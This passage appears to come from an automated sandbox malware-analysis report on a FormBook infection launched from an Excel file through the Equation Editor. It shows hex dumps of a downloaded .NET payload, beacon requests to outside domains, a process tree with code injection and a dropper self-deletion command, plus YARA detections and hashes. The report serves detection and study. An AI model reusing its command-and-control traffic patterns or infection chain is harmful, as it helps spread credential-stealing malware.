                                                                                                                                                  Jul 22, 2021 17:15:02.833103895 CEST3INData Raw: 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3b 00 00 70 7e 07 00 00 04 6f 38 00 00 0a 28 39 00 00 0a 0b 07 74 26 00 00 01 0a 2b 00 06 2a 26 00 02 28 3a 00 00 0a 00 2a 13 30 02 00 3c 00 00
                                                                                                                                                  Data Ascii: +*"*0&(r;p~o8(9t&+*&(:*0<~(4,!r[p(5o6s7~+*0~+*"*0(rp~o;+*0(rp~
                                                                                                                                                  Jul 22, 2021 17:15:02.833125114 CEST4INData Raw: 00 13 30 02 00 3b 00 00 00 0d 00 00 11 00 02 28 2e 00 00 06 7e 47 00 00 0a 28 48 00 00 0a 16 fe 01 0b 07 2c 08 7e 45 00 00 0a 0a 2b 19 00 02 28 2e 00 00 06 8c 29 00 00 01 72 db 00 00 70 28 49 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 31 00 00 00 13
                                                                                                                                                  Data Ascii: 0;(.~G(H,~E+(.)rp(I+*01(4,+.+rp+rp+~E+*02(JoKr/p(L(Mr_prpoN+*V(:(<(%*03sO(<
                                                                                                                                                  Jul 22, 2021 17:15:02.833147049 CEST5INData Raw: 16 08 00 00 1b 6f 5d 00 00 0a 00 dc 07 6f 6a 00 00 0a 0c 08 7e 45 00 00 0a 16 28 46 00 00 0a 16 fe 03 13 08 11 08 2c 12 08 16 08 6f 6b 00 00 0a 17 da 6f 6c 00 00 0a 0a 2b 09 00 7e 45 00 00 0a 0a 2b 00 06 2a 00 00 01 10 00 00 02 00 1b 00 3f 5a 00
                                                                                                                                                  Data Ascii: o]oj~E(F,okol+~E+*?Z0roZ~E(F,R}%;omsb+ (Xoci-++*0-{~E(F
                                                                                                                                                  Jul 22, 2021 17:15:02.876674891 CEST7INData Raw: 00 0c 00 00 00 09 00 00 11 00 02 7b 1e 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 1e 00 00 04 2a 00 00 13 30 01 00 0c 00 00 00 09 00 00 11 00 02 7b 1f 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 1f 00 00 04 2a 00 00 13 30 01 00 0c 00 00 00 0a 00 00 11 00
                                                                                                                                                  Data Ascii: {+*&}*0{+*&}*0{ +*&} *0 { rprp(zo{+*0{!+*&}!*0{"+*&}"*0{#+
                                                                                                                                                  Jul 22, 2021 17:15:02.876698971 CEST8INData Raw: 11 04 72 e5 03 00 70 6f 55 00 00 0a 6f 56 00 00 0a 6f 50 00 00 06 00 11 06 11 04 72 11 04 00 70 6f 55 00 00 0a 6f 56 00 00 0a 28 4c 00 00 06 6f 4e 00 00 06 00 09 11 06 6f 79 00 00 0a 00 00 11 05 6f 5c 00 00 0a 13 07 11 07 3a 69 fe ff ff de 17 11
                                                                                                                                                  Data Ascii: rpoUoVoPrpoUoV(LoNoyo\:iu{,u{o]+*A40}%ou8I(vo}oUo}o~9"o}r-po9o}r-po
                                                                                                                                                  Jul 22, 2021 17:15:02.876715899 CEST10INData Raw: 0a 00 08 72 b5 03 00 70 6f 55 00 00 0a 02 28 62 00 00 06 13 06 12 06 28 67 00 00 0a 6f 84 00 00 0a 00 08 72 cd 03 00 70 6f 55 00 00 0a 02 28 51 00 00 06 6f 84 00 00 0a 00 08 72 e5 03 00 70 6f 55 00 00 0a 02 28 4f 00 00 06 6f 84 00 00 0a 00 08 72
                                                                                                                                                  Data Ascii: rpoU(b(gorpoU(QorpoU(OorpoU(Koo\:u{,u{o]+(Drp(Loa*A:q0sO(Drp(L
                                                                                                                                                  Jul 22, 2021 17:15:02.876730919 CEST11INData Raw: 00 04 0a 2b 00 06 2a 26 00 02 03 7d 35 00 00 04 2a 00 00 13 30 01 00 0c 00 00 00 09 00 00 11 00 02 7b 34 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 34 00 00 04 2a 00 00 13 30 01 00 0c 00 00 00 09 00 00 11 00 02 7b 33 00 00 04 0a 2b 00 06 2a 26 00 02
                                                                                                                                                  Data Ascii: +*&}5*0{4+*&}4*0{3+*&}3*0{2+*&}2*02(JoKr/p(L(Mr_prpoN+*V(:((~*0,sO(rp(L
                                                                                                                                                  Jul 22, 2021 17:15:02.876748085 CEST12INData Raw: 00 00 06 6f 75 00 00 0a 0b 2b 70 12 01 28 76 00 00 0a 0c 08 6f 46 00 00 06 14 fe 03 0d 09 2c 59 08 6f 46 00 00 06 6f 6f 00 00 0a 13 04 2b 2b 12 04 28 70 00 00 0a 13 05 11 05 6f 81 00 00 06 02 28 81 00 00 06 16 28 46 00 00 0a 16 fe 01 13 06 11 06
                                                                                                                                                  Data Ascii: ou+p(voF,YoFoo++(po((F,E(q-o](w-o]+*#Il0(+*(:*0rGp+
                                                                                                                                                  Jul 22, 2021 17:15:02.876764059 CEST14INData Raw: 6f 97 00 00 06 6f 8f 00 00 0a 16 6f a5 00 00 0a 00 02 6f 97 00 00 06 6f a7 00 00 0a 00 02 6f 97 00 00 06 16 6f a5 00 00 0a 00 02 16 28 a5 00 00 0a 00 2a c6 02 28 85 00 00 0a 02 02 fe 06 e5 00 00 06 73 a8 00 00 0a 28 a9 00 00 0a 02 02 fe 06 f1 00
                                                                                                                                                  Data Ascii: ooooooo(*(s(s((*01,{;+,{;o](*$%06sosososo
                                                                                                                                                  Jul 22, 2021 17:15:02.876782894 CEST15INData Raw: 96 00 00 0a 00 02 6f af 00 00 06 72 d3 09 00 70 6f 97 00 00 0a 00 02 6f af 00 00 06 1f 4b 1f 17 73 92 00 00 0a 6f 93 00 00 0a 00 02 6f af 00 00 06 19 6f 98 00 00 0a 00 02 6f af 00 00 06 72 e9 09 00 70 6f c2 00 00 0a 00 02 6f af 00 00 06 17 6f c3
                                                                                                                                                  Data Ascii: orpooKsoooorpoooooo- soorpoosoooorpoooo soorpo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.2249166199.59.242.15380C:\Windows\explorer.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:16:38.442984104 CEST755OUTGET /wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz HTTP/1.1
                                                                                                                                                  Host: www.pon.xyz
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Jul 22, 2021 17:16:38.568079948 CEST756INHTTP/1.1 200 OK
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:16:38 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NfckuEfRDoobrXb4RjADejgmV/38jhHArz5PznadVW/EOMjYWMA8MO/wUYEIfOHtudiTqbwWGyf8XYQ99hFcOA==
                                                                                                                                                  Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4e 66 63 6b 75 45 66 52 44 6f 6f 62 72 58 62 34 52 6a 41 44 65 6a 67 6d 56 2f 33 38 6a 68 48 41 72 7a 35 50 7a 6e 61 64 56 57 2f 45 4f 4d 6a 59 57 4d 41 38 4d 4f 2f 77 55 59 45 49 66 4f 48 74 75 64 69 54 71 62 77 57 47 79 66 38 58 59 51 39 39 68 46 63 4f 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                                                                                                  Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NfckuEfRDoobrXb4RjADejgmV/38jhHArz5PznadVW/EOMjYWMA8MO/wUYEIfOHtudiTqbwWGyf8XYQ99hFcOA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one
                                                                                                                                                  Jul 22, 2021 17:16:38.568145990 CEST757INData Raw: 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 7a 78 2e 73 65 61 72 63 68 21 3d 3d 27 3f 7a 27 29 7b 61 7a 78 2e 68 72 65 66 3d 27 2f 3f 7a 27 3b 7d 7d 3b 44 44 2e 6f 6e 6c 6f 61 64 3d 44 44 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63
                                                                                                                                                  Data Ascii: rror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$(goog
                                                                                                                                                  Jul 22, 2021 17:16:38.568177938 CEST759INData Raw: 2c 52 72 3d 77 69 6e 64 6f 77 2c 61 7a 78 3d 52 72 2e 6c 6f 63 61 74 69 6f 6e 2c 61 41 42 3d 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2c 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 53 66 3d 44 54 2e 62 6f 64 79 7c 7c 44 54 2e 67 65 74 45 6c 65 6d 65 6e 74 73
                                                                                                                                                  Data Ascii: ,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body||DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else if(Sf
                                                                                                                                                  Jul 22, 2021 17:16:38.568193913 CEST759INData Raw: 67 5f 70 64 2e 72 5f 77 68 3a 27 26 77 68 3d 27 2b 61 41 78 29 2b 0a 28 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 21 3d 3d 65 66 3f 27 26 72 65 66 5f 6b 65 79 77 6f 72 64 3d 27 2b 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 3a 27 27 29
                                                                                                                                                  Data Ascii: g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(
                                                                                                                                                  Jul 22, 2021 17:16:38.568216085 CEST759INData Raw: 31 31 35 0d 0a 67 5f 70 64 2e 73 75 62 69 64 31 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 31 3d 27 2b 67 5f 70 64 2e 73 75 62 69 64 31 3a 27 27 29 2b 0a 28 67 5f 70 64 2e 73 75 62 69 64 32 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 32 3d 27 2b 67 5f 70
                                                                                                                                                  Data Ascii: 115g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+(g_pd.subid2!==ef?'&subid2='+g_pd.subid2:'')+(g_pd.subid3!==ef?'&subid3='+g_pd.subid3:'')+(g_pd.subid4!==ef?'&subid4='+g_pd.subid4:'')+(g_pd.subid5!==ef?'&subid5='+g_pd.subid5:'');Sf.appendC


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.2249167151.101.0.11980C:\Windows\explorer.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:16:43.686728001 CEST760OUTGET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1
                                                                                                                                                  Host: www.intoxickiss.com
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Jul 22, 2021 17:16:43.832999945 CEST761INHTTP/1.1 302 Found
                                                                                                                                                  server: adobe
                                                                                                                                                  cache-control: no-cache, no-store, private, must-revalidate, max-age=0, max-stale=0, post-check=0, pre-check=0
                                                                                                                                                  location: https://portfolio.adobe.com/missing
                                                                                                                                                  x-trace-id: nhEa/ME/ozF9cbxuUwEh+E96PhQ
                                                                                                                                                  x-app-name: Pro2-Renderer
                                                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:16:43 GMT
                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                  Connection: close
                                                                                                                                                  X-Served-By: cache-hhn4076-HHN
                                                                                                                                                  X-Cache: MISS
                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                  X-Timer: S1626967004.724224,VS0,VE99
                                                                                                                                                  Vary: Fastly-SSL, X-Use-Renderer
                                                                                                                                                  Jul 22, 2021 17:16:43.833024025 CEST761INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  Analysis Process: EXCEL.EXE PID: 2384 Parent PID: 584

                                                                                                                                                  General

                                                                                                                                                  Start time:17:14:41
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x13fcd0000
                                                                                                                                                  File size:27641504 bytes
                                                                                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: EQNEDT32.EXE PID: 3024 Parent PID: 584

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:03
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:543304 bytes
                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: vbc.exe PID: 1700 Parent PID: 3024

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:04
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x270000
                                                                                                                                                  File size:713216 bytes
                                                                                                                                                  MD5 hash:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: vbc.exe PID: 1780 Parent PID: 1700

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:25
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                  Imagebase:0x270000
                                                                                                                                                  File size:713216 bytes
                                                                                                                                                  MD5 hash:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: explorer.exe PID: 1388 Parent PID: 1780

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:27
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                  Imagebase:0xffca0000
                                                                                                                                                  File size:3229696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: rundll32.exe PID: 1688 Parent PID: 1780

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:53
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Imagebase:0x20000
                                                                                                                                                  File size:44544 bytes
                                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: cmd.exe PID: 1544 Parent PID: 1688

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:54
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x4ab10000
                                                                                                                                                  File size:302592 bytes
                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >

                                                                                                                                                    Analysis Process: vbc.exe PID: 1780 Parent PID: 1700 vbc.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00418212, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: R=A$R=A
                                                                                                                                                    • API String ID: 2738559852-3742021989
                                                                                                                                                    • Opcode ID: 8d84f146c1ebe742c4e4cdf8f6d20a1662f4c6ae84c71951c5677573750651d5
                                                                                                                                                    • Instruction ID: 9cb8217a44f5398f35c528a2c7b32146d9e6fee16c4aea30883c611f01566702
                                                                                                                                                    • Opcode Fuzzy Hash: 8d84f146c1ebe742c4e4cdf8f6d20a1662f4c6ae84c71951c5677573750651d5
                                                                                                                                                    • Instruction Fuzzy Hash: B21107B6600108AFCB08DF99DC80DEB77A9FF8C354B15864DF91DA7211CA34E8518BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041826B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: R=A$R=A
                                                                                                                                                    • API String ID: 2738559852-3742021989
                                                                                                                                                    • Opcode ID: 3bc95cc17d5a2cf010c9cbb611e3294351af47f2d3f07930dba50ef40a10354a
                                                                                                                                                    • Instruction ID: a92a8c88a9129f29b21f3a41422dff40099807f3aaef247726c3f1628650d80f
